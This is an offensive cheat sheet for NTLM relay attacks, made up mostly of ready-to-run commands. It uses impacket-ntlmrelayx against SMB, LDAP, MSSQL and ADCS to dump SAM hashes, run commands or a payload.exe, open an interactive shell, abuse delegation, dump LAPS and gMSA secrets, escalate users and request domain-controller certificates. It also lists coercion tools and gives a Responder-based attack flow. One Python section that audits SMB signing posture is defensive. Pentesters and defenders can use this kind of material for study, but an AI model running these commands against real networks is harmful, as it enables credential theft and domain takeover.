Overview

Capture NTLM authentication and relay it to another service. The attacker acts as a man-in-the-middle: the victim authenticates to the attacker, and the attacker forwards that authentication to the target.

Check SMB Signing

crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
Targets with SMB signing disabled or not required are relayable.
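As an added audit helper (not part of this page, crackmapexec or impacket): a parser that classifies a host's signing posture from the SMB2 NEGOTIATE response, the same property --gen-relay-list keys on, so a defender can verify that signing is actually required on every host. The sample responses and host names below are constructed inline; the dialect value is an assumption.

```python
import struct

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000              # Command value of a NEGOTIATE message
SMB2_FLAGS_SERVER_TO_REDIR = 0x0001  # Flags bit set on every response
SIGNING_ENABLED = 0x0001             # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002            # SMB2_NEGOTIATE_SIGNING_REQUIRED


def signing_posture(msg: bytes) -> str:
    """Classify a raw SMB2 NEGOTIATE response (64-byte header + body) as
    "required" (relay rejected), "enabled" (optional, relayable; the default
    on workstations and member servers) or "disabled" (relayable)."""
    if len(msg) < 68 or msg[:4] != SMB2_PROTOCOL_ID:
        raise ValueError("not an SMB2 message")
    # Header (MS-SMB2 2.2.1.2): Command at offset 12, Credit at 14, Flags at 16
    command, _credit, flags = struct.unpack_from("<HHI", msg, 12)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # Body (MS-SMB2 2.2.4): StructureSize (always 65), then SecurityMode
    structure_size, security_mode = struct.unpack_from("<HH", msg, 64)
    if structure_size != 65:
        raise ValueError("malformed NEGOTIATE response")
    if security_mode & SIGNING_REQUIRED:
        return "required"
    if security_mode & SIGNING_ENABLED:
        return "enabled"
    return "disabled"


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed sample, not a real capture; fields the classifier ignores are zero."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_PROTOCOL_ID, 64, 0, 0,
                         SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
                         0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x00" * 16, 0, 0, 0, 0, 0, 0, 0, 0, 0) + b"\x00"
    return header + body


# Constructed inventory: hostname -> NEGOTIATE response received from it
SAMPLE_HOSTS = {
    "dc01": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
    "ws07": build_negotiate_response(SIGNING_ENABLED),   # workstation default
    "fs02": build_negotiate_response(0),                 # signing off entirely
}


def relay_exposed(hosts: dict) -> list:
    """Hosts that do not require signing: the ones a relay list would contain
    and that need RequireSecuritySignature enforced."""
    return sorted(h for h, m in hosts.items() if signing_posture(m) != "required")
```

Running relay_exposed(SAMPLE_HOSTS) returns ["fs02", "ws07"]; only dc01 passes the audit.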

ntlmrelayx — SMB Relay

Basic (SAM Dump)

impacket-ntlmrelayx -tf targets.txt -smb2support

Execute Command

impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"

Interactive Shell

impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Connect: nc 127.0.0.1 11000

Execute Binary

impacket-ntlmrelayx -tf targets.txt -smb2support -e payload.exe

ntlmrelayx — LDAP Relay

Create Machine Account (RBCD)

impacket-ntlmrelayx -t ldap://DC_IP --delegate-access

Dump LDAP

impacket-ntlmrelayx -t ldap://DC_IP --dump-laps
impacket-ntlmrelayx -t ldap://DC_IP --dump-gmsa

Add User to Group

impacket-ntlmrelayx -t ldap://DC_IP --escalate-user targetuser

ntlmrelayx — MSSQL

impacket-ntlmrelayx -t mssql://SQL_IP -smb2support -q "SELECT system_user"

ntlmrelayx — ADCS (ESC8)

impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce Authentication

Trigger the victim to authenticate to the attacker:

Tool         | Method
-------------|---------------------------
Responder    | LLMNR/NBT-NS poisoning
PetitPotam   | MS-EFSRPC
PrinterBug   | MS-RPRN (SpoolService)
DFSCoerce    | MS-DFSNM
ShadowCoerce | MS-FSRVP

Typical Attack Flow

1. Disable the SMB and HTTP servers in Responder (Responder handles poisoning only; ntlmrelayx takes the incoming authentication)
2. Start ntlmrelayx with targets
3. Start Responder
4. Wait for auth → relay → profit

Responder Config

# /etc/responder/Responder.conf
SMB = Off
HTTP = Off

# Then start Responder on the listening interface
responder -I eth0

Quick Reference

Task         | Command
-------------|------------------------------------------------------
Find targets | crackmapexec smb SUBNET --gen-relay-list targets.txt
Relay SMB    | ntlmrelayx -tf targets.txt -smb2support
Relay LDAP   | ntlmrelayx -t ldap://DC --delegate-access
Relay ADCS   | ntlmrelayx -t http://CA/certsrv/... --adcs
Exec cmd     | ntlmrelayx -tf targets.txt -c "whoami"